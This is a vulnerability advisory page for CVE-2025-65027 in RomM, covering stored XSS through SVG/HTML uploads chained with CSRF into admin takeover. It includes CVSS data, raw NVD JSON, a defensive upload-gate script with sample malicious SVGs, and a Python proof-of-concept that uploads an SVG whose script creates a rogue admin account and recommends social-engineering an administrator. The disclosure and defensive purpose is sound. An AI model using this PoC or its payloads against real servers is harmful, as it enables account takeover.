Security Vulnerability Report
CVE-2025-65027 CVSS 7.6 HIGH

CVE-2025-65027

Published: 2025-12-03 20:16:26
Last Modified: 2026-02-24 20:04:06

Description

RomM (ROM Manager) allows users to scan, enrich, browse and play their game collections with a clean and responsive interface. RomM contains multiple unrestricted file upload vulnerabilities that allow authenticated users to upload malicious SVG or HTML files. When such a file is opened in the browser, the embedded JavaScript executes, resulting in stored Cross-Site Scripting (XSS). Combined with a CSRF misconfiguration, this enables full administrative account takeover: creating a rogue admin account, escalating the attacker's own account to the admin role, and more. The vulnerability is fixed in 4.4.1 and 4.4.1-beta.2.
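The root cause named above (CWE-434, unrestricted upload of browser-executable SVG/HTML) is usually mitigated in two layers: refuse active markup at upload time by inspecting the bytes, not the extension or the client's Content-Type, and serve whatever is stored so that even a gate bypass cannot run script in the application's origin. The following is an added example written for this page; it is not RomM's code and not the fix shipped in 4.4.1, which the page does not detail. The function names (`classify_upload`, `serve_headers`), the regex policy, and the constructed samples are all assumptions. The CSRF part of the chain is not described on the page, so nothing here addresses it.

```python
# Added example, not RomM's own code: a byte-level gate for user uploads plus
# the response headers that stop a stored SVG/HTML file from running script in
# the application's origin. Names, policy and samples are assumptions.
import re
from dataclasses import dataclass

# Comments and the XML prolog are skipped before the root element is read, so
# '<?xml ...?><!-- c --><svg>' is still recognised as SVG.
_COMMENT = re.compile(rb"<!--.*?-->", re.S)
_FIRST_TAG = re.compile(rb"<\s*([A-Za-z][\w:-]*)")  # does not match <?xml or <!DOCTYPE
_HTML_ROOTS = {b"html", b"head", b"body"}
# Fragments without an <html> root are still rendered as HTML if served inline.
_HTML_FRAGMENT = re.compile(rb"<\s*(script|iframe|object|embed|meta|link|form)\b", re.I)
# Script vectors inside SVG: <script>, <foreignObject> (embeds HTML), SMIL
# elements that can rewrite href, on* event handlers and javascript: URLs.
# External <use>/<image> references are not flagged here.
_SVG_ACTIVE = re.compile(
    rb"<\s*(script|foreignObject|set|animate)\b|\bon[a-z]+\s*=|href\s*=\s*[\"']?\s*javascript:",
    re.I,
)


@dataclass(frozen=True)
class Verdict:
    kind: str      # "html", "svg-active", "svg" or "other"
    reject: bool
    reason: str


def classify_upload(data: bytes, sniff_len: int = 4096) -> Verdict:
    """Decide from the bytes alone whether an upload is browser-executable
    markup. Filename and client Content-Type are ignored on purpose: both
    are chosen by the uploader."""
    head = _COMMENT.sub(b"", data[:sniff_len]).lstrip(b"\xef\xbb\xbf \t\r\n")
    m = _FIRST_TAG.search(head)
    root = m.group(1).lower() if m else b""
    if root in _HTML_ROOTS:
        return Verdict("html", True, "HTML document")
    if root == b"svg":
        if _SVG_ACTIVE.search(data):
            return Verdict("svg-active", True,
                           "SVG with script, event handler, SMIL or javascript: URL")
        return Verdict("svg", False, "SVG without active content")
    if _HTML_FRAGMENT.search(head):
        return Verdict("html", True, "HTML fragment")
    return Verdict("other", False, "no executable markup detected")


_SAFE_NAME = re.compile(r"[^A-Za-z0-9._-]+")


def serve_headers(filename: str, verdict: Verdict) -> dict[str, str]:
    """Headers for serving a stored upload. Even a file that passed the gate is
    delivered as a download, with MIME sniffing off and a CSP sandbox, so a
    gate bypass lands in an opaque origin with no script and no cookies."""
    safe = _SAFE_NAME.sub("_", filename).strip("._") or "download"
    content_type = "image/svg+xml" if verdict.kind == "svg" else "application/octet-stream"
    return {
        "Content-Type": content_type,
        "Content-Disposition": f'attachment; filename="{safe}"',
        "X-Content-Type-Options": "nosniff",
        "Content-Security-Policy": "default-src 'none'; sandbox",
    }


# Constructed samples for the demo; not taken from any real server.
SAMPLES = {
    "malicious.svg": (b'<?xml version="1.0"?>\n<svg xmlns="http://www.w3.org/2000/svg">'
                      b'<script><![CDATA[fetch("/api/users", {method: "POST"})]]></script></svg>'),
    "onload.svg": b'<svg xmlns="http://www.w3.org/2000/svg" onload="alert(1)"><rect/></svg>',
    "logo.svg": b'<!-- logo --><svg xmlns="http://www.w3.org/2000/svg"><rect width="1" height="1"/></svg>',
    "cover.png": b"<!DOCTYPE html><html><body><script>alert(1)</script></body></html>",  # HTML renamed .png
    "real.png": b"\x89PNG\r\n\x1a\n" + b"\x00" * 16,
}


def gate_all(samples=SAMPLES) -> dict[str, Verdict]:
    """Run the gate over every sample and return the verdicts by name."""
    return {name: classify_upload(data) for name, data in samples.items()}


if __name__ == "__main__":
    for name, verdict in gate_all().items():
        action = "REJECT" if verdict.reject else "accept"
        print(f"{name:15} {action:7} {verdict.kind:11} {verdict.reason}")
    print(serve_headers("logo.svg", classify_upload(SAMPLES["logo.svg"])))
```

The `sandbox` CSP directive is what makes the serving side robust: a document delivered with it gets an opaque origin and, without `allow-scripts`, no script execution, so even an SVG that slips past the regex cannot issue authenticated same-origin requests the way the stored-XSS chain above requires. Browsers render a sandboxed SVG inside an `<img>` tag exactly as before, so the restriction costs nothing for legitimate artwork.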

CVSS Details

CVSS Score
7.6
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:H/A:H
Weaknesses
CWE-79 (Cross-Site Scripting), CWE-352 (Cross-Site Request Forgery), CWE-434 (Unrestricted Upload of File with Dangerous Type)

Configurations (Affected Products)

cpe:2.3:a:romm.app:romm:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:romm.app:romm:4.4.1:beta1:*:*:*:*:*:* - VULNERABLE
RomM < 4.4.1
RomM < 4.4.1-beta.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python

import requests

# CVE-2025-65027 PoC - Malicious SVG file upload for Stored XSS
# Target: RomM < 4.4.1
# NOTE: the endpoint paths (/api/auth/login, /api/upload, /api/admin/users)
# and the response fields used below are this PoC's assumptions, not values
# confirmed by the advisory. Verify them against the target's API first.
TARGET_URL = "http://target-romm-server.com"
USERNAME = "attacker"
PASSWORD = "password123"


# Step 1: Login to get authentication token
def login():
    session = requests.Session()
    login_url = f"{TARGET_URL}/api/auth/login"
    data = {"username": USERNAME, "password": PASSWORD}
    resp = session.post(login_url, json=data)
    resp.raise_for_status()
    return session, resp.json().get("access_token")


# Step 2: Upload malicious SVG file with XSS payload
def upload_malicious_svg(session, token):
    upload_url = f"{TARGET_URL}/api/upload"
    headers = {"Authorization": f"Bearer {token}"}
    # Malicious SVG with XSS payload. The script runs when an authenticated
    # admin opens the stored file directly, so the fetch below carries the
    # admin's session and creates a rogue admin account.
    malicious_svg = '''<?xml version="1.0" encoding="UTF-8"?>
<svg xmlns="http://www.w3.org/2000/svg">
  <script><![CDATA[
    // Runs with the admin's session: create a rogue admin
    fetch('/api/admin/users', {
      method: 'POST',
      headers: {'Content-Type': 'application/json'},
      body: JSON.stringify({
        username: 'rogue_admin',
        password: 'P@ssw0rd123!',
        role: 'admin'
      })
    });
  ]]></script>
  <rect width="100" height="100" fill="red"/>
</svg>'''
    files = {'file': ('malicious.svg', malicious_svg, 'image/svg+xml')}
    resp = session.post(upload_url, headers=headers, files=files)
    return resp.json()


# Step 3: Trigger XSS by accessing the uploaded file (only confirms the file
# is served inline; the payload has effect when an admin opens it)
def trigger_xss(session, file_path):
    access_url = f"{TARGET_URL}{file_path}"
    session.get(access_url)
    return True


if __name__ == "__main__":
    print("CVE-2025-65027 PoC - RomM Unrestricted File Upload leading to Stored XSS")
    session, token = login()
    if token:
        print("[+] Login successful, token obtained")
        result = upload_malicious_svg(session, token)
        print(f"[+] Malicious SVG uploaded: {result}")
        # In a real attack, social engineer an admin into opening the file
        print("[*] Wait for admin to access the file to trigger XSS")
    else:
        print("[-] Login failed: no access_token in response")

References

https://github.com/rommapp/romm/security/advisories/GHSA-v3c6-w996-f7hx (Vendor Advisory, Mitigation)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-65027",
    "sourceIdentifier": "[email protected]",
    "published": "2025-12-03T20:16:25.913",
    "lastModified": "2026-02-24T20:04:06.050",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "RomM (ROM Manager) allows users to scan, enrich, browse and play their game collections with a clean and responsive interface. RomM contains multiple unrestricted file upload vulnerabilities that allow authenticated users to upload malicious SVG or HTML files. When these files are accessed the browser executes embedded JavaScript, leading to stored Cross-Site Scripting (XSS) which when combined with a CSRF misconfiguration they lead to achieve full administrative account takeover, creating a rogue admin account, escalating the attacker account role to admin, and much more. This vulnerability is fixed in 4.4.1 and 4.4.1-beta.2."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:H/A:H",
            "baseScore": 7.6,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "REQUIRED",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 2.1,
          "impactScore": 5.5
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {"lang": "en", "value": "CWE-79"},
          {"lang": "en", "value": "CWE-352"},
          {"lang": "en", "value": "CWE-434"}
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:romm.app:romm:*:*:*:*:*:*:*:*",
                "versionEndExcluding": "4.4.1",
                "matchCriteriaId": "3501BC54-F9F3-4C68-AD5E-142908B2948C"
              },
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:romm.app:romm:4.4.1:beta1:*:*:*:*:*:*",
                "matchCriteriaId": "93D1318D-39AA-4BCF-BACF-A869B8444BAE"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/rommapp/romm/security/advisories/GHSA-v3c6-w996-f7hx",
        "source": "[email protected]",
        "tags": ["Mitigation", "Vendor Advisory"]
      }
    ]
  }
}